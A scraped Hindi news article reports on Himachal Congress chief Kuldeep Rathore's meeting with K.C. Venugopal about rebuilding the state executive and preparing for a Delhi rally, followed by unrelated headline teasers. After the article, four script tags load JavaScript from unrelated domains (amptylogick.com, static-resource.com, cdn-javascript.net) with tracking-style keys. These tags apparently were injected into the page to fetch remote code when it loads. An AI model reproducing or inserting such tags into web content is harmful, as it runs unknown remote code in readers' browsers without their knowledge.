<p>हिमाचल कार्यकारिणी भंग होने के बाद प्रदेश अध्यक्ष कुलदीप राठ़ौर ने केसी वेणुगोपाल से मुलाक़ात की। इस दौरान उन्होंने संगठन महासचिव को प्रदेश में कांग्रेस के आयोजित विभिन्न कार्यक्रमों की जानकारी दी। इस दौरान दोनों नेताओं के बीच कार्यसमिति के गठन और प्रारूप को लेकर विस्तृत चर्चा की।</p>
<p>राठ़ौर ने कहा कि प्रदेश कांग्रेस प्रभारी रजनी पाटिल के नई दिल्ली में न होने के कारण अभी यह चर्चा पूरी नहीं हो सकी है। रजनी पाटिल के नई दिल्ली वापस आने पर उनसे विचार विमर्श के बाद इसे अंतिम रूप दे दिया जाएगा। महाराष्ट्र में सरकार गठन को लेकर चल रही प्रक्रिया के कारण रजनी पाटिल वहां व्यस्त है। उनके आते ही विचार विमर्श के बाद प्रदेश कार्यकारिणी को अंतिम रूप देने के साथ ही कांग्रेस की राष्ट्रीय अध्यक्ष सोनिया गांधी की स्वीकृति के लिए भेजा जायेगा।</p>
<p>राठौर ने बताया कि इस दौरान 14 दिसम्बर को नई दिल्ली में होने वाली अखिल भारतीय कांग्रेस पार्टी की महा रैली के आयोजन और इसमें प्रदेश की सहभागिता तथा इसकी तैयारियों को अंतिम रूप देने के मसौदे पर भी विस्तृत चर्चा की गई। वहीं, बढ़ती महंगाई और बेरोजगारी के विरोध में हाल ही में हुए कांग्रेस के प्रदेशव्यापी आंदोलन की सराहना करते हुए प्रदेश कांग्रेस कमेटी को इसके सफल आयोजन पर उन्हें बधाई दी। जिस ढंग से प्रदेश अध्यक्ष कार्य कर रहें हैं वह सराहनीय है और प्रदेश में कांग्रेस मजबूत स्थिति में उभर रही है।</p>
<p> </p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1575025631282″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Himachal green corridor charging stations: हिमाचल प्रदेश में जल्द ही पांच ग्रीन कॉरिडोर पर…
Controversy Over Pay Disparity : हिमाचल प्रदेश के जनजातीय क्षेत्र भरमौर में एक विद्यालय…
KarwaChauthVrat: हर साल कार्तिक मास की चतुर्थी तिथि को करवा चौथ का पावन पर्व…
मेष🐐 (चू, चे, चो, ला, ली, लू, ले, लो, अ) आज आपका दिन बढ़िया रहेगा…
Shimla ropeway project: राजधानी शिमला में बनने वाले विश्व के दूसरे और देश के…
Postmaster Embezzlement Case: चंबा जिले के दरेकड़ी डाकघर के पोस्टमास्टर को उपभोक्ताओं की आरडी और…